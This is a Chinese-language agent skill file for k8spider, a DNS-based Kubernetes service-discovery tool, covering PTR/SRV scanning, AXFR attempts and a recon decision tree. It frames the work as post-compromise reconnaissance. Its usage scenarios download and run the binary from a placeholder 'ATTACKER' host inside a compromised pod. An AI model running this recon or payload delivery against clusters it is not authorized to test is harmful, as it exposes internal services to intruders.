--- name: k8spider description: "使用 k8spider 进行 Kubernetes 集群 DNS 服务发现与侦察。当需要低权限枚举 K8s 集群中的 Service、探测 DNS 服务、扫描网段 PTR/SRV 记录、尝试 AXFR 区域传输时使用。k8spider 仅需 DNS 访问权限即可发现集群内所有服务,无需 API Server 权限。涉及 K8s 服务发现、DNS 侦察、集群信息收集、PTR 扫描、SRV 枚举的场景使用此技能。当用户提到 k8spider、K8s DNS 枚举、集群服务扫描、DNS 区域传输时也应触发" metadata: tags: "k8spider,kubernetes,k8s,dns,service discovery,PTR,SRV,AXFR,recon,侦察,服务发现,集群扫描" category: "tool" --- # K8Spider — Kubernetes DNS 服务发现 k8spider 是一个基于 DNS 的 K8s 服务发现工具——**只需能访问集群 DNS,即可低权限枚举所有 Service**。无需 API Server Token,无需特殊权限,纯 DNS 查询搞定。 项目地址:https://github.com/Esonhugh/k8spider ## 第一步:直接运行(使用默认参数) k8spider 会从 `/etc/resolv.conf` 自动读取 DNS 服务器地址,使用内置默认 CIDR。先直接跑: ```bash k8spider all ``` 如果有输出,说明默认参数命中了,直接进入分析环节。 ## 第二步:默认参数无结果时,手动收集网络信息 如果 `k8spider all` 没有发现任何信息,说明默认 CIDR 或 DNS 不对,需要从当前机器收集真实参数。 ### 确定目标 CIDR(-c 参数) CIDR 网段需要从当前容器的网络配置中提取: ```bash # 方式 1:从环境变量获取(K8s 注入) echo $KUBERNETES_SERVICE_HOST # 返回的 IP 所在网段通常就是 Service CIDR 范围 # 方式 2:从 IP 地址推断 ip addr show # 或 ifconfig # 找到容器自身 IP 和掩码,推断所在网段 # 方式 3:从路由表推断 ip route # 查看路由信息,推断集群网段范围 ``` Pod 网段和 Service 网段通常是相邻的 /16,可从容器自身 IP 推断 Service CIDR 的可能范围。 ### 确定并验证 DNS 服务器(-d 参数) DNS 地址必须通过可靠方式找到并验证可用: ```bash # 方式 1:从 resolv.conf 读取(最可靠) cat /etc/resolv.conf # nameserver 行就是集群 DNS 地址 # 方式 2:用 k8spider 自带命令定位 k8spider whereisdns # 验证 DNS 是否可达且响应 nslookup kubernetes.default.svc.cluster.local # 或 dig @ kubernetes.default.svc.cluster.local # 有正常应答说明 DNS 可用 ``` 验证通过后再指定 DNS 运行: ```bash k8spider all -d -c ``` ## 核心命令 ### 全量扫描(推荐首选) 一键跑完所有发现方式,获取最全面的服务列表: ```bash # 先用默认参数试 k8spider all # 默认不生效时,用手动收集的参数 k8spider all -c -d # 输出示例: # [PTR] 10.43.0.10 -> dns-default.kube-system.svc.cluster.local # [PTR] 10.43.0.1 -> kube-dns.kube-system.svc.cluster.local # [SRV] _http._tcp.kubernetes.default.svc.cluster.local -> 10.43.0.1:443 ``` ### PTR 记录扫描(反向 DNS) 通过 IP 反查域名,逐 IP 扫描网段: ```bash k8spider ptr -c ``` PTR 扫描的逻辑:对 CIDR 中每个 IP 发起反向 DNS 查询,K8s DNS 会返回 `svc-name.namespace.svc.cluster.local` 格式的域名,直接暴露服务名和命名空间。 ### SRV 记录枚举 查询 DNS SRV 记录发现服务端口: ```bash k8spider srv -c -z cluster.local ``` ### 通配符 DNS 查询 利用 K8s DNS 的通配符解析特性发现服务: ```bash k8spider wild -c -z cluster.local ``` ### AXFR 区域传输 尝试 DNS 区域传输,一次获取整个 zone 的所有记录: ```bash k8spider axfr -z cluster.local -d ``` 注意:AXFR 通常被限制,但值得一试——如果成功,这是最快最全的方式。 ### 同网段扫描 发现 DNS 服务所在子网的服务: ```bash k8spider neighbor -d ``` ### 子网计算与扫描 自动计算 DNS 服务所在子网并扫描: ```bash k8spider subnet -d ``` ### kube-state-metrics 解析 从 kube-state-metrics 端点提取服务信息: ```bash k8spider metrics ``` ## 全局选项 | 选项 | 说明 | 默认值 | |------|------|--------| | `-c` | 目标 CIDR 网段 | 内置默认值,视环境而定 | | `-z` | DNS zone 名称 | `cluster.local` | | `-d` | DNS 服务器地址 | 从 resolv.conf 读取 | | `-t` | 启用多线程 | 关闭 | | `-n` | 线程数 | 10 | ## 使用场景 ### 场景 1:Pod 内使用(已拿到容器 shell) ```bash # 投递二进制到容器 curl -o /tmp/k8spider https://ATTACKER/k8spider && chmod +x /tmp/k8spider # 直接用默认参数跑 /tmp/k8spider all # 没结果再收集网络信息手动指定 ``` ### 场景 2:通过 kubectl 使用 ```bash # 在现有 Pod 中执行 kubectl exec -it target-pod -- ./k8spider all # 或创建临时 Pod kubectl run k8spider --image=busybox --restart=Never -- \ wget -O /tmp/k8spider URL && /tmp/k8spider all ``` ### 场景 3:远程使用(需 DNS 可达) ```bash # 必须手动指定 -d 和 -c,远程环境下默认参数基本不适用 k8spider all -c -d -z cluster.local ``` ## 决策树 ``` 进入容器后: ├─ 第一步:k8spider all(直接用默认参数跑) ├─ 有结果 → 分析输出,拿到服务列表 ├─ 无结果 → 收集网络信息 │ ├─ 获取 CIDR:从 ip addr / ifconfig / 环境变量推断 │ ├─ 获取 DNS:cat /etc/resolv.conf 或 k8spider whereisdns │ └─ 验证 DNS:nslookup kubernetes.default.svc.cluster.local ├─ 用收集到的参数重跑:k8spider all -c -d ├─ 想要端口信息 → k8spider srv ├─ 赌一把全量 → k8spider axfr ├─ 想快速发现 → k8spider neighbor / k8spider subnet ├─ 有 metrics 端点 → k8spider metrics └─ 网段大、速度慢 → 加 -t -n 50 开多线程 ```